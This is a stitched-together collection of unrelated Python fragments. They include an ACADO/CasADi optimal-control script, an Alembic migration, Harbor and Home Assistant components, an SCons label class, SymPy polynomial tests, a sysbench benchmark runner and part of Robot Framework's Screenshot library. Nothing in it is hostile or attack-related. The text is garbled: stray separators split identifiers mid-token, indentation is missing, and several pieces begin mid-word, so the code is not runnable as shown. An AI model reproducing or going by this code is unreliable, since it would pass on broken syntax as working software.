# Plot
plt.figure(1)
plt.clf()
plt.subplot(311)
plt.plot(t,x1)
plt.grid()
plt.ylabel('x1')
plt.subplot(312)
plt.plot(t,x2)
plt.grid()
plt.ylabel('x2')
plt.subplot(313)
plt.plot(t,u)
plt.grid()
plt.ylabel('u')
plt.xlabel('time')
sfile = zipfile.ZipFile(curr_dir+'/VDP_pack_VDP_Opt.jmu','r')
mfile = sfile.extract('modelDescription.xml','.')
os.remove('VDP_pack_VDP_Opt.jmu')
os.rename('modelDescription.xml','vdp.xml')
# Allocate a parser and load the xml
parser = FMIParser('vdp.xml')
# Dump representation to screen
print "XML representation"
print parser
# Obtain the symbolic representation of the OCP
ocp = parser.parse()
# Print the ocp to screen
print ocp
# Sort the variables according to type
var = OCPVariables(ocp.variables)
# The right hand side of the ACADO functions
acado_in = ACADO_FCN_NUM_IN * [[]]
# Time
acado_in[ACADO_FCN_T] = [var.t_]
# Convert stl vector of variables to list of expressions
def toList(v, der=False):
ret = []
for i in v:
if der:
ret.append(i.der())
else:
ret.append(i.var())
return ret
# Differential state
acado_in[ACADO_FCN_XD] = toList(ocp.x_)
# Algebraic state
acado_in[ACADO_FCN_XA] = toList(ocp.z_)
# Control
acado_in[ACADO_FCN_U] = toList(ocp.u_)
# Parameter
acado_in[ACADO_FCN_P] = toList(ocp.p_)
# State derivative
acado_in[ACADO_FCN_XDOT] = toList(ocp.x_,True)
# The DAE function
ffcn_out = list(ocp.dae) + list(ocp.ae)
ffcn = SXFunction(acado_in,[ffcn_out])
# Objective function
mfcn = SXFunction(acado_in,[ocp.mterm])
# Path constraint function
cfcn = SXFunction(acado_in,[ocp.cfcn])
# Initial constraint function
rfcn = SXFunction(acado_in,[ocp.initeq])
# Create ACADO solver
ocp_solver = AcadoInterface(ffcn,mfcn,cfcn,rfcn)
# Create an integrator
dae_in = DAE_NUM_IN * [[]]
dae_in[DAE_T] = acado_in[ACADO_FCN_T]
dae_in[DAE_Y] = acado_in[ACADO_FCN_XD] + acado_in[ACADO_FCN_XA]
dae_in[DAE_YDOT] = acado_in[ACADO_FCN_XDOT] + list(ssym("zdot",len(acado_in[ACADO_FCN_XA])))
dae_in[DAE_P] = acado_in[ACADO_FCN_P] + acado_in[ACADO_FCN_U]
dae = SXFunction(dae_in,[ffcn_out])
integrator = IdasIntegrator(dae)
#integrator.setOptio | n("exact_jacobian",True)
#integrator.setOption("linear_multistep_method","bdf") # adams or bdf
#i | ntegrator.setOption("nonlinear_solver_iteration","newton") # newton or functional
integrator.setOption("number_of_fwd_dir",4)
integrator.setOption("number_of_adj_dir",0)
integrator.setOption("fsens_err_con",True)
integrator.setOption("quad_err_con",True)
integrator.setOption("abstol",1e-8)
integrator.setOption("reltol",1e-8)
integrator.setOption("is_differential",len(acado_in[ACADO_FCN_XD])*[1] + len(acado_in[ACADO_FCN_XA])*[0])
# Pass the integrator to ACADO
ocp_solver.setIntegrator(integrator)
# Set options
ocp_solver.setOption("start_time",ocp.t0)
ocp_solver.setOption("final_time",ocp.tf)
num_nodes = 30
ocp_solver.setOption("number_of_shooting_nodes",num_nodes)
ocp_solver.setOption("max_num_iterations",100)
ocp_solver.setOption("kkt_tolerance",1e-4)
ocp_solver.setOption("integrator","casadi")
ocp_solver.setOption("integrator_tolerance",1e-6)
# Initialize
ocp_solver.init()
# Set bounds on states
cfcn_lb = []
for i in ocp.cfcn_lb:
cfcn_lb.append(float(i))
ocp_solver.setInput(cfcn_lb,"lbc")
cfcn_ub = []
for i in ocp.cfcn_ub:
cfcn_ub.append(float(i))
ocp_solver.setInput(cfcn_ub,"ubc")
# Solve the optimal control problem
ocp_solver.solve()
# Print optimal cost
cost = ocp_solver.getOutputData(ACADO_COST)[0]
print "optimal cost = ", cost
# Print optimal parameters
popt = ocp_solver.getOutputData(ACADO_P_OPT)
print "optimal parameter values = ", popt
# Time grid
t_opt = NP.linspace(0,ocp.tf,num_nodes+1)
# Plot optimal control
u_opt = ocp_solver.getOutputData(ACADO_U_OPT)
plt.figure(3)
plt.plot(t_opt,u_opt)
# Plot optimal state trajectory
x_opt = ocp_solver.getOutputData(ACADO_X_OPT)
x_opt = array(x_opt) # create numpy array
x_opt = x_opt.reshape(num_nodes+1, 3)
plt.figure(4)
plt.plot(t_opt,x_opt)
# Show the plots
plt.ion()
plt.show()
|
"""empty message
Revision ID: 4fe34588268f
Revises: 26dba2ff3e74
Create Date: 2014-12-09 01:41:2 | 4.333058
"""
# revision identifiers, used by Alembic.
revision = '4fe34588268f'
down_revision = '26dba2ff3e74'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade | ():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
|
import os
| from g import config_dir, templates_dir, DEFAULT_GID, DEFAULT_UID
from utils.misc import prepare_dir
from utils.jinja import render_jinja
registryctl_config_dir = os.path.join(config_dir, "registryctl")
registryctl_config_template_path = os.path.join(templates_dir, "registryctl", "config.yml.jinja")
registryctl_conf = os.path.join(config_ | dir, "registryctl", "config.yml")
registryctl_env_template_path = os.path.join(templates_dir, "registryctl", "env.jinja")
registryctl_conf_env = os.path.join(config_dir, "registryctl", "env")
levels_map = {
'debug': 'debug',
'info': 'info',
'warning': 'warn',
'error': 'error',
'fatal': 'fatal'
}
def prepare_registry_ctl(config_dict):
# prepare dir
prepare_dir(registryctl_config_dir)
# Render Registryctl env
render_jinja(
registryctl_env_template_path,
registryctl_conf_env,
**config_dict)
# Render Registryctl config
render_jinja(
registryctl_config_template_path,
registryctl_conf,
uid=DEFAULT_UID,
gid=DEFAULT_GID,
level=levels_map[config_dict['log_level']],
**config_dict)
|
import time
import test_rnd as rnd
import random
import pysos
# initialize the data
N = 1234
it | ems = [(rnd.utf8(20), rnd.utf8(200)) | for i in range(N)]
start = time.time()
db = pysos.Dict('temp/sos_dict')
#import shelve
#db = shelve.open('temp.shelve')
print("%.2fs: %d items loaded" % (time.time() - start, len(db)))
# add all items
for key,val in items:
db[key] = val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# update all values
random.shuffle(items)
for key,val in items:
db[key] = 'updated ' + val
print("%.2fs: %d items updated" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == 'updated ' + val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# delete all keys
random.shuffle(items)
for key,val in items:
del db[key]
print("%.2fs: %d items deleted" % (time.time() - start, len(items)))
# add all keys
random.shuffle(items)
for key,val in items:
db[key] ='again ' + val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val = db[key]
print("%.2fs: %d items read" % (time.time() - start, len(items)))
N = len(db)
db.close()
print("%.2fs: DB closed containing %d item" % (time.time() - start, N))
#print("free lines: %d" % len(db._free_lines))
|
import sys
import argparse
import pickle
def read_index(pickleFile):
pickleFile = open(pickleFile, 'rb')
index = pickle.load(pickleFile)
return index
def main(args):
wordIndex = read_index('indice.pickle')
docIndex = read_index('indice_doc.pickle')
wordList = | args.palabras
for word in wordList:
print wordIndex[word]
# print docIndex
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Busca palabras')
parser.add_argument('palabras', metavar='N', type=str, nargs='+', help='Palabras a buscar en el indice')
args = parser. | parse_args()
main(args)
|
"""
A component which allows you to send data to Dweet.io.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/dweet/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import EVENT_STATE_CHANGED, STATE_UNKNOWN
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
DOMAIN = "dweet"
DEPENDENCIES = []
REQUIREMENTS = ['dweepy==0.2.0']
CONF_NAME = 'name'
CONF_WHITELIST = 'whitelist'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
# pylint: disable=too-many-locals
def setup(hass, config):
"""Setup the Dweet.io component."""
conf = config[DOMAIN]
name = conf[CONF_NAME]
whitelist = conf.get(CONF_WHITELIST, [])
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
stat | e = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueErro | r:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data '%s' to Dweet.io", msg)
|
# Copyright (c) 2013 Che-Liang Chiou
import os
import re
from SCons.Script import Dir
class Label(object):
VALID_NAME = re.compile(r'^[A-Za-z0-9_.\-/]+$')
@classmethod
def make_label(cls, label_str):
package_str = None
target_str = None
if not isinstance(label_str, str):
# Assume it is a SCons File node.
label_str = label_str.srcnode().path
package_str, target_str = os.path.split(label_str)
elif label_str.startswith('#'):
label_str = label_str[1:]
if ':' in label_str:
package_str, target_str = label_str.split(':', 1)
else:
package_str = label_str
elif label_str.startswith(':'):
target_str = label_str[1:]
else:
target_str = label_str
package_name = PackageName.make_package_name(package_str)
if not target_str:
target_str = os.path.basename(package_name.path)
target_name = TargetName(target_str)
return cls(package_name, target_name)
@classmethod
def make_label_list(cls, label_strs):
if isinstance(label_strs, str):
label_strs = label_strs.split()
return [cls.make_label(label_str) for label_str in label_strs]
@staticmethod
def check_name(name):
if not name:
raise ValueError('empty name')
if name.startswith('/') or name.endswith('/'):
raise ValueError('leading or trailing path separator: %s' % name)
if '//' in name:
raise ValueError('consecutive path separators: %s' % name)
if not Label.VALID_NAME.match(name):
raise ValueError('invalid name character: %s' % name)
def __init__(self, package_name, target_name):
assert isinstance(package_name, PackageName)
assert isinstance(target_name, TargetName)
self.package_name = package_name
self.target_name = target_name
def __str__(self):
return '#%s:%s' % (self.package_name, self.target_name)
def __repr__(self):
return '%s("%s")' % (self.__class__.__name__, str(self))
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(repr(self))
@property
def path(self):
return os.path.join(self.package_name.path, self.target_name.path)
class LabelOfRule(Label):
pass
class LabelOfFile(Label):
pass
class PackageName(object):
@classmethod
def make_package_name(cls, package_str=None):
assert package_str is None or isinstance(package_str, str)
if not package_str:
package_str = Dir('.').srcnode().path
return cls(package_str)
def __init__(self, package_name):
assert isinstance(package_name, str)
Label.check_name(package_name)
self.package_name = package_name
def __str__(self):
return self.package_name
def __repr__(self):
return 'PackageName("%s")' % self.package_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.package_name)
@property
def path(self):
return self.package_name
class TargetName(object):
def __init__(self, target_name):
| assert isinstance(target_name, str)
Label.check_name(target_na | me)
self.target_name = target_name
def __str__(self):
return self.target_name
def __repr__(self):
return 'TargetName("%s")' % self.target_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.target_name)
@property
def path(self):
return self.target_name
|
ssert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is S.false
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is S.false
assert re(roots[3]).epsilon_eq(+0.87743, eps) is S.false
assert im(roots[3]).epsilon_eq(-0.74486, eps) is S.false
assert re(roots[4]).epsilon_eq(+0.87743, eps) is S.false
assert im(roots[4]).epsilon_eq(+0.74486, eps) is S.false
raises(DomainError, lambda: Poly(x + y, x).nroots())
raises(MultivariatePolynomialError, lambda: Poly(x + y).nroots())
assert nroots(x**2 - 1) == [-1.0, 1.0]
roots = nroots(x**2 - 1)
assert roots == [-1.0, 1.0]
assert nroots(x + I) == [-1.0*I]
assert nroots(x + 2*I) == [-2.0*I]
raises(PolynomialError, lambda: nroots(0))
# issue 8296
f = Poly(x**4 - 1)
assert f.nroots(2) == [w.n(2) for w in f.all_roots()]
def test_ground_roots():
f = x**6 - 4*x**4 + 4*x**3 - x**2
assert Poly(f).ground_roots() == {S(1): 2, S(0): 2}
assert ground_roots(f) == {S(1): 2, S(0): 2}
def test_nth_power_roots_poly():
f = x**4 - x**2 + 1
f_2 = (x**2 - x + 1)**2
f_3 = (x**2 + 1)**2
f_4 = (x**2 + x + 1)**2
f_12 = (x - 1)**4
assert nth_power_roots_poly(f, 1) == f
raises(ValueError, lambda: nth_power_roots_poly(f, 0))
raises(ValueError, lambda: nth_power_roots_poly(f, x))
assert factor(nth_power_roots_poly(f, 2)) == f_2
assert factor(nth_power_roots_poly(f, 3)) == f_3
assert factor(nth_power_roots_poly(f, 4)) == f_4
assert factor(nth_power_roots_poly(f, 12)) == f_12
raises(MultivariatePolynomialError, lambda: nth_power_roots_poly(
x + y, 2, x, y))
def test_torational_factor_list():
p = expand(((x**2-1)*(x-2)).subs({x:x*(1 + sqrt(2))}))
assert _torational_factor_list(p, x) == (-2, [
(-x*(1 + sqrt(2))/2 + 1, 1),
(-x*(1 + sqrt(2)) - 1, 1),
(-x*(1 + sqrt(2)) + 1, 1)])
p = expand(((x**2-1)*(x-2)).subs({x:x*(1 + 2**Rational(1, 4))}))
assert _torational_factor_list(p, x) is None
def test_cancel():
assert cancel(0) == 0
assert cancel(7) == 7
assert cancel(x) == x
assert cancel(oo) == oo
assert cancel((2, 3)) == (1, 2, 3)
assert cancel((1, 0), x) == (1, 1, 0)
assert cancel((0, 1), x) == (1, 0, 1)
f, g, p, q = 4*x**2 - 4, 2*x - 2, 2*x + 2, 1
F, G, P, Q = [ Poly(u, x) for u in (f, g, p, q) ]
assert F.cancel(G) == (1, P, Q)
assert cancel((f, g)) == (1, p, q)
assert cancel((f, g), x) == (1, p, q)
assert cancel((f, g), (x,)) == (1, p, q)
assert cancel((F, G)) == (1, P, Q)
assert cancel((f, g), polys=True) == (1, P, Q)
assert cancel((F, G), polys=False) == (1, p, q)
f = (x**2 - 2)/(x + sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x - sqrt(2)
f = (x**2 - 2)/(x - sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x + sqrt(2)
assert cancel((x**2/4 - 1, x/2 - 1)) == (S(1)/2, x + 2, 1)
assert cancel((x**2 - y)/(x - y)) == 1/(x - y)*(x**2 - y)
assert cancel((x**2 - y**2)/(x - y), x) == x + y
assert cancel((x**2 - y**2)/(x - y), y) == x + y
assert cancel((x**2 - y**2)/(x - y)) == x + y
assert cancel((x**3 - 1)/(x**2 - 1)) == (x**2 + x + 1)/(x + 1)
assert cancel((x**3/2 - S(1)/2)/(x**2 - 1)) == (x**2 + x + 1)/(2*x + 2)
assert cancel((exp(2*x) + 2*exp(x) + 1)/(exp(x) + 1)) == exp(x) + 1
f = Poly(x**2 - a**2, x)
g = Poly(x - a, x)
F = Poly(x + a, x)
G = Poly(1, x)
assert cancel((f, g)) == (1, F, G)
f = x**3 + (sqrt(2) - 2)*x**2 - (2*sqrt(2) + 3)*x - 3*sqrt(2)
g = x**2 - 2
assert cancel((f, g), extension=True) == (1, x**2 - 2*x - 3, x - sqrt(2))
f = Poly(-2*x + 3, x)
g = Poly(-x**9 + x**8 + x**6 - x**5 + 2*x**2 - 3*x + 1, x)
assert cancel((f, g)) == (1, -f, -g)
f = Poly(y, y, domain='ZZ(x)')
g = Poly(1, y, domain='ZZ[x]')
assert f.cancel(
g) == (1, Poly(y, y, domain='ZZ(x)'), Poly(1, y, domain='ZZ(x)'))
assert f.cancel(g, include=True) == (
Poly(y, y, domain='ZZ(x)'), Poly(1, y, domain='ZZ(x)'))
f = Poly(5*x*y + x, y, domain='ZZ(x)')
g = Poly(2*x**2*y, y, domain='ZZ(x)')
assert f.cancel(g, include=True) == (
Poly(5*y + 1, y, domain='ZZ(x)'), Poly(2*x*y, y, domain='ZZ(x)'))
f = -(-2*x - 4*y + 0.005*(z - y)**2)/((z - y)*(-z + y + 2))
assert cancel(f).is_Mul == True
P = tanh(x - 3.0)
Q = tanh(x + 3.0)
f = ((-2*P**2 + 2)*(-P**2 + 1)*Q**2/2 + (-2*P**2 + 2)*(-2*Q**2 + 2)*P*Q - (-2*P**2 + 2)*P**2*Q**2 + (-2*Q**2 + 2)*(-Q**2 + 1)*P**2/2 - (-2*Q**2 + 2)*P**2*Q**2)/(2*sqrt(P**2*Q**2 + 0.0001)) \
+ (-(-2*P**2 + 2)*P*Q**2/2 - (-2*Q**2 + 2)*P**2*Q/2)*((-2*P**2 + 2)*P*Q**2/2 + (-2*Q**2 + 2)*P**2*Q/2)/(2*(P**2*Q**2 + 0.0001)**(S(3)/2))
assert cancel(f).is_Mul == True
# issue 7022
A = Symbol('A', commutative=False)
p1 = Piecewise((A*(x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p2 = Piecewise((A*(x - 1), x > 1), (1/x, True))
assert cancel(p1) == p2
assert cancel(2*p1) == 2*p2
assert cancel(1 + p1) == 1 + p2
assert cancel((x**2 - 1)/(x + 1)*p1) == (x - 1)*p2
assert cancel((x**2 - 1)/(x + 1) + p1) == (x - 1) + p2
p3 = Piecewise(((x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p4 = Piecewise(((x - 1), x > 1), (1/x, True))
assert cancel(p3) == p4
assert cancel(2*p3) == 2*p4
assert cancel(1 + p3) == 1 + p4
assert cancel((x**2 - 1)/(x + 1)*p3) == (x - 1)*p4
assert cancel((x**2 - 1)/(x + 1) + p3) == (x - 1) + p4
# issue 9363
M = MatrixSymbol('M', 5, 5)
assert cancel(M[0,0] + 7) == M[0,0] + 7
expr = sin(M[1, 4] + M[2, 1] * 5 * M[4, 0]) - 5 * M[1, 2] / z
assert cancel(expr) == expr
def test_reduced():
f = 2*x**4 + y**2 - x**2 + y**3
G = [x**3 - x, y**3 - y]
Q = [2*x, 1]
r = x**2 + y**2 + y
assert reduced(f, G) == (Q, r)
assert reduced(f, G, x, y) == (Q, r)
H = groebner(G)
assert H.reduce(f) == (Q, r)
Q = [Poly(2*x, x, y), Poly(1, x, y)]
r = Poly(x**2 + y**2 + y, x, y)
assert _stric | t_eq(reduced(f, G, polys=True), (Q, r))
assert _strict_eq(reduced(f, G, x, y, polys=True), (Q, r))
H = groebner(G, polys=True)
assert _strict_eq(H.reduce(f), (Q, r))
f = 2*x**3 + y**3 + 3*y
G = groebner([x**2 + y**2 - 1, | x*y - 2])
Q = [x**2 - x*y**3/2 + x*y/2 + y**6/4 - y**4/2 + y**2/4, -y**5/4 + y**3/2 + 3*y/4]
r = 0
assert reduced(f, G) == (Q, r)
assert G.reduce(f) == (Q, r)
assert reduced(f, G, auto=False)[1] != 0
assert G.reduce(f, auto=False)[1] != 0
assert G.contains(f) is True
assert G.contains(f + 1) is False
assert reduced(1, [1], x) == ([1], 0)
raises(ComputationFailed, lambda: reduced(1, [1]))
def test_groebner():
assert groebner([], x, y, z) == []
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex') == [1 + x**2, -1 + y**4]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex') == [-1 + y**4, z**3, 1 + x**2]
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex', polys=True) == \
[Poly(1 + x**2, x, y), Poly(-1 + y**4, x, y)]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex', polys=True) == \
[Poly(-1 + y**4, x, y, z), Poly(z**3, x, y, z), Poly(1 + x**2, x, y, z)]
assert groebner([x**3 - 1, x**2 - 1]) == [x - 1]
assert groebner([Eq(x**3, 1), Eq(x**2, 1)]) == [x - 1]
F = [3*x**2 + y*z - 5*x - 1, 2*x + 3*x*y + y**2, x - 3*y + x*z - 2*z**2]
f = z**9 - x**2*y**3 - 3*x*y**2*z + 11*y*z**2 + x**2*z**2 - 5
G = groebner(F, x, y, z, modulus=7, symmetric=False)
assert G == [1 + x + y + 3*z + 2*z**2 + 2*z**3 + 6*z**4 + z**5,
1 + 3*y + y**2 + 6*z**2 + 3*z**3 + 3*z**4 + 3*z**5 + 4*z**6,
1 + 4*y + 4*z + y*z + 4*z**3 + z**4 + z**6,
6 + 6*z + z**2 + 4*z**3 + 3*z**4 + 6*z**5 + 3*z**6 + z**7]
Q, r = reduced(f, G, x, y, z, modulus=7, symmetric=False, polys=True)
assert sum([ q*g for q, g in zip(Q, G.polys)], r) == Poly(f, modulus=7)
|
mbers reported by each reporting
interval, and the summary latency numbers printed at the end of the run in
"General Statistics" -> "Response Time".
Example Sysbench output:
sysbench 0.5: multi-threaded system evaluation benchmark
<... lots of output we don't care here ...>
Threads started!
[ 2s] threads: 16, tps: 526.38, reads: 7446.79, writes: 2105.52, response
time: 210.67ms (99%), errors: 0.00, reconnects: 0.00
< .... lots of tps output every 2 second, we need all those>
< ... lots of other output we don't care for now...>
General statistics:
total time: 17.0563s
total number of events: 10000
total time taken by event execution: 272.6053s
response time:
min: 18.31ms
avg: 27.26ms
max: 313.50ms
approx. 99 percentile: 57.15ms
< We care about the response time section above, these are latency numbers>
< then there are some outputs after this, we don't care either>
Args:
sysbench_output: The output from sysbench.
results: The dictionary to store results based on sysbench output.
metadata: The metadata to be passed along to the Samples class.
"""
all_tps = []
seen_general_statistics = False
seen_response_time = False
response_times = {}
sysbench_output_io = StringIO.StringIO(sysbench_output)
for line in sysbench_output_io.readlines():
if re.match('^\[', line):
tps = re.findall('tps: (.*?),', line)
all_tps.append(float(tps[0]))
continue
if line.startswith('General statistics:'):
seen_general_statistics = True
continue
if seen_general_statistics:
if re.match('^ +response time:.*', line):
seen_response_time = True
continue
if seen_general_statistics and seen_response_time:
for token in RESPONSE_TIME_TOKENS:
search_string = '.*%s: +(.*)ms' % token
if re.findall(search_string, line):
response_times | [token] = float(re.findall(search_string, line)[0])
tps_line = ', '.join(map(str, all_tps))
# Print all tps data points in the log for reference. And report
# percentiles of these tps data in the final result set.
logging.info('All TPS numbers: \n %s', tps_line)
tps_percentile = sample.PercentileCalculator(all_tps)
for percentile in sample.PERCENTILES_LIST:
percentile_string = 'p | %s' % str(percentile)
logging.info('%s tps %f', percentile_string,
tps_percentile[percentile_string])
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, percentile_string)
results.append(sample.Sample(
metric_name,
tps_percentile[percentile_string],
NA_UNIT,
metadata))
# Also report average, stddev, and coefficient of variation
for token in ['average', 'stddev']:
logging.info('tps %s %f', token, tps_percentile[token])
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, token)
results.append(sample.Sample(
metric_name,
tps_percentile[token],
NA_UNIT,
metadata))
if tps_percentile['average'] > 0:
cv = tps_percentile['stddev'] / tps_percentile['average']
logging.info('tps coefficient of variation %f', cv)
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, 'cv')
results.append(sample.Sample(
metric_name,
cv,
NA_UNIT,
metadata))
# Now, report the latency numbers.
for token in RESPONSE_TIME_TOKENS:
logging.info('%s_response_time is %f', token, response_times[token])
metric_name = '%s %s' % (SYSBENCH_RESULT_NAME_LATENCY, token)
if token == 'percentile':
metric_name = '%s %s' % (metric_name, FLAGS.sysbench_latency_percentile)
results.append(sample.Sample(
metric_name,
response_times[token],
MS_UNIT,
metadata))
def _GetSysbenchCommandPrefix():
""" Decides what the prefix is for sysbench command based on os type.
Args:
None.
Returns:
A string representing the sysbench command prefix.
"""
if FLAGS.os_type == 'rhel':
return vm_util.VM_TMP_DIR
else:
return NORMAL_SYSBENCH_PATH_PREFIX
def _IssueSysbenchCommand(vm, duration):
""" Issues a sysbench run command given a vm and a duration.
Does nothing if duration is <= 0
Args:
vm: The test VM to issue command to.
duration: the duration of the sysbench run.
Returns:
stdout, stderr: the result of the command.
"""
stdout = ''
stderr = ''
oltp_script_path = '%s%s' % (_GetSysbenchCommandPrefix(), OLTP_SCRIPT_PATH)
if duration > 0:
run_cmd_tokens = ['sysbench',
'--test=%s' % oltp_script_path,
'--mysql_svc_oltp_tables_count=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--oltp-table-size=%d' %
FLAGS.mysql_svc_oltp_table_size,
'--rand-init=%s' % RAND_INIT_ON,
'--db-ps-mode=%s' % DISABLE,
'--oltp-dist-type=%s' % UNIFORM,
'--oltp-read-only=%s' % OFF,
'--num-threads=%d' % FLAGS.sysbench_thread_count,
'--percentile=%d' % FLAGS.sysbench_latency_percentile,
'--report-interval=%d' %
FLAGS.sysbench_report_interval,
'--max-requests=0',
'--max-time=%d' % duration,
'--mysql-user=%s' % vm.db_instance_master_user,
'--mysql-password="%s"' %
vm.db_instance_master_password,
'--mysql-host=%s' % vm.db_instance_address,
'run']
run_cmd = ' '.join(run_cmd_tokens)
stdout, stderr = vm.RobustRemoteCommand(run_cmd)
logging.info('Sysbench results: \n stdout is:\n%s\nstderr is\n%s',
stdout, stderr)
return stdout, stderr
def _RunSysbench(vm, metadata):
""" Runs the Sysbench OLTP test.
The test is run on the DB instance as indicated by the vm.db_instance_address.
Args:
vm: The client VM that will issue the sysbench test.
metadata: The PKB metadata to be passed along to the final results.
Returns:
Results: A list of results of this run.
"""
results = []
if not hasattr(vm, 'db_instance_address'):
logging.error(
'Prepare has likely failed, db_instance_address is not found.')
raise DBStatusQueryError('RunSysbench: DB instance address not found.')
# Create the sbtest database for Sysbench.
# str(uuid.uuid4())[-8:]
create_sbtest_db_cmd = ('mysql -h %s -u %s -p%s '
'-e \'create database sbtest;\'') % (
vm.db_instance_address,
vm.db_instance_master_user,
vm.db_instance_master_password)
stdout, stderr = vm.RemoteCommand(create_sbtest_db_cmd)
logging.info('sbtest db created, stdout is %s, stderr is %s',
stdout, stderr)
# Provision the Sysbench test based on the input flags (load data into DB)
# Could take a long time if the data to be loaded is large.
data_load_start_time = time.time()
prepare_script_path = '%s%s' % (_GetSysbenchCommandPrefix(),
PREPARE_SCRIPT_PATH)
data_load_cmd_tokens = ['sysbench',
'--test=%s' % prepare_script_path,
'--mysql_svc_oltp_tables_count=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--oltp-table-size=%d' %
FLAGS.mysql_svc_oltp_table_size,
'--rand-init=%s' % RAND_INIT_ON,
'--num-threads=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--mysql-user=%s' % vm.db_instance_master_user,
'--mysql-password="%s"' %
vm.db_instance_master_password,
'--mysql-host=%s' % vm.db_instance_address, |
port Toolkit, Robot, Rectangle
from javax.imageio import ImageIO
from java.io import File
elif sys.platform == 'cli':
import clr
clr.AddReference('System.Windows.Forms')
clr.AddReference('System.Drawing')
from System.Drawing import Bitmap, Graphics, Imaging
from System.Windows.Forms import Screen
else:
try:
import wx
except ImportError:
wx = None
try:
from gtk import gdk
except ImportError:
gdk = None
try:
from PIL import ImageGrab # apparently available only on Windows
except ImportError:
ImageGrab = None
from robot import utils
from robot.api import logger
from robot.libraries.BuiltIn import BuiltIn
from robot.version import get_version
class Screenshot(object):
"""Test library for taking screenshots on the machine where tests are run.
Notice that successfully taking screenshots requires tests to be run with
a physical or virtual display.
This library was heavily enhanced in Robot Framework 2.5.5 release. Old
keywords for taking screenshots were deprecated and they have since been
removed.
= Using with Python =
With Python you need to have one of the following modules installed to be
able to use this library. The first module that is found will be used.
- wxPython :: http://wxpython.org :: Required also by RIDE so many Robot
Framework users already have this module installed.
- PyGTK :: http://pygtk.org :: This module is available by default on most
Linux distributions.
- Python Imaging Library (PIL) :: http://www.pythonware.com/products/pil ::
This module can take screenshots only on Windows.
= Using with Jython and IronPython =
With Jython and IronPython this library uses APIs provided by JVM and .NET
platforms, respectively. These APIs are always available and thus no
external modules are needed.
IronPython support was added in Robot Framework 2.7.5.
= Where screenshots are saved =
By default screenshots are saved into the same directory where the Robot
Framework log file is written. If no log is created, screenshots are saved
into the directory where the XML output file is written.
It is possible to specify a custom location for screenshots using
`screenshot_directory` argument in `importing` and `Set Screenshot Directory`
keyword during execution. It is also possible to save screenshots using
an absolute path.
"""
ROBOT_LIBRARY_SCOPE = 'TEST SUITE'
ROBOT_LIBRARY_VERSION = get_version()
def __init__(self, screenshot_directory=None):
"""Configure where screenshots are saved.
If `screenshot_directory` is not given, screenshots are saved into
same directory as the log file. The directory can also be set using
`Set Screenshot Directory` keyword.
Examples (use only one of these):
| =Setting= | =Value= | =Value= | =Value= |
| Library | Screenshot | | # Default location |
| Library | Screenshot | ${TEMPDI | R} | # System temp |
"""
self._given_screenshot_dir = self._norm_path(screenshot_directory)
self._screenshot_taker = ScreenshotTaker()
def _norm_path(self, path):
if not path:
return path
return os.path.normpath(path.replace('/', os.sep))
@property
def _screenshot_dir(se | lf):
return self._given_screenshot_dir or self._log_dir
@property
def _log_dir(self):
variables = BuiltIn().get_variables()
outdir = variables['${OUTPUTDIR}']
log = variables['${LOGFILE}']
log = os.path.dirname(log) if log != 'NONE' else '.'
return self._norm_path(os.path.join(outdir, log))
def set_screenshot_directory(self, path):
